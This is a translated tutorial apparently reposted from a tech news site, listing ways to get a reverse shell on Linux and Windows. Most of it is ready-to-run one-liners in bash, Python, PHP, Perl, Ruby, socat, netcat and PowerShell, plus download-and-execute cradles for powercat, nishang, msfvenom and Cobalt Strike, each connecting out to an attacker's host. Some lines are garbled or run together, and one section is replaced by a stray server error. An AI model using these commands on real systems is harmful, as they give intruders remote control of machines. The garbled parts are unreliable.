Shulou(Shulou.com)05/31 Report--

This article mainly introduces the methods of rebound shell, the article is very detailed, has a certain reference value, interested friends must read it!

preface

What is a Reverse Shell?

That is, the control end listens to a TCP/UDP port, and the controlled end initiates a request to the port and transfers the input and output of its command line to the control end. Reverse shell corresponds to standard shells such as telnet and ssh, which is essentially the role reversal of the client and server of the network concept.

Why do I need a rebound shell?

Rebound shell is usually used for controlled end due to firewall restrictions, insufficient permissions, port occupied and so on. In the penetration process, it is often impossible to connect directly to the target machine due to port restrictions. In this case, you need to bounce the shell to obtain an interactive shell in order to continue to dig deeper. The following details several ways to bounce shells on Windows and Linux systems.

I. Rebound shell under Linux

Experimental environment:

Win10 192.168.2.102 NC Monitoring

Kali 192.168.2.103 comes with tools

1. bash anti-bounce bash -i >& /dev/tcp/192.168.2.102/7777 0>&1

In special cases, bash bounce shell can be executed using base64 encoding

Code address: www.jackson-t.ca/runtime-exec-payloads.html

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAyLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'

Execute bash command in kali that will parse to pre-code

192.168.2.102 requested URL/bin/bash/was not found on this server.

The parameter followed by-e represents the program executed after the connection is created, which means that after connecting to the remote, a local shell(/bin/bash) can be executed remotely, that is, a shell is bounced to the remote. You can see that the remote has successfully bounced to the shell and can execute commands.

3.curl rebound

Kali starts the apache service by writing the bash command to an html file, as long as the text contains bash.

curl 192.168.2.103/bash.html|bash

4. whois bounce

whois -h 192.168.2.102-p 4444 `pwd` //The bouncing shell can only execute the commands that follow

5.python anti-bounce python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.102",4444));os.dup2(s.fileno(),0); os.dup2 (s. fileno(),1); os.dup2 (s. fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

6. PHP bounce

PHP bounces shell and python in much the same way

php -r '$sock=fsockopen("192.168.2.102",4444);exec("/bin/sh -i &3 2>&3"):'7.ruby anti-bounce ruby -rsocket -e'f=TCPSocket.open("192.168.2.102",4444).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f)'

8.socat anti-bounce socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp: 192.168.2.102:4444

Perl anti-bounce perl -e 'use Socket;$i="192.168.2.102";$p=4444; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Second, bounce shell under Windows 1. powercat bounce

① Download remote PS1 script with IEX and return permission to bypass execution

Executing IEX (New-Object) using powershell

System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.2.103 -p 4444 -e cmd

② Powercat download address: github.com/besimorhino/powercat to local execution

Powercat is Netcat Powershell version, actually a powershell function, similar to Netcat

2. NC rebound

Server rebound: nc 192.168.2.103 4444 -e c:\windows\system32\cmd.exe

3.Nishang rebound

Nishang download address: github.com/samratashok/nishang

Nishang is a PowerShell based attack framework that integrates PowerShell attack scripts and payloads to bounce TCP/ UDP/ HTTP/HTTPS/ ICMP type shells.

Download nishang locally to the attacker and execute the following command on the target using powershell

IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.103 -port 4444

4.Reverse UDP shell

Attacker listening nc -lvup 4444

Using the above download or on the attacker, execute the following command on the target powershell

IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.103/nishang/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.2.103 -port 4444

5. MSF rebound

We can directly use msfvenom -l combined with keyword filtering (such as cmd/windows/reverse) to find out the path information of the various types of rebound payloads we need.

msfvenom -l payloads | grep 'cmd/windows/reverse'

According to the command found above to generate a sentence payload path, we use the following command to generate a rebound sentence, and then copy and paste it to the drone to run.

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.2.103 LPORT=4444

drone execution using powershell execution payload

Attackers return to shell

6. Cobalt strike bounce shell

Cobalt strike Scripted Web Delivery module, can be bounced through bitsadmin, powershell, python, regsvR32 shell, similar to metasploit web_delivery module

① Operation server

./ teamserver 192.168.2.103 123 #123 is the connection password

② Operating client:

Windows Run cobaltstrike.jar #Username Enter any password 123

③ Open monitor:

Click Cobalt Strike->Listeners

payloadWindows/beacon_http/reverse_http

Description: Windows/beacon is Cobalt Strike's own module, including dns,http,https,smb four ways of listening, windows/foreign is an external listener, that is, msf or Armitage listener.

④ Generate powershell payload:

Click Attack -> Web Drive-by -> Scripted Web Delivery

Type Select powershell

Payload generated:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.103:8887/a'))"

5 The generated code has been given and executed on Windows.

The above is "What are the methods of bouncing shell" All the contents of this article, thank you for reading! Hope to share the content to help everyone, more relevant knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.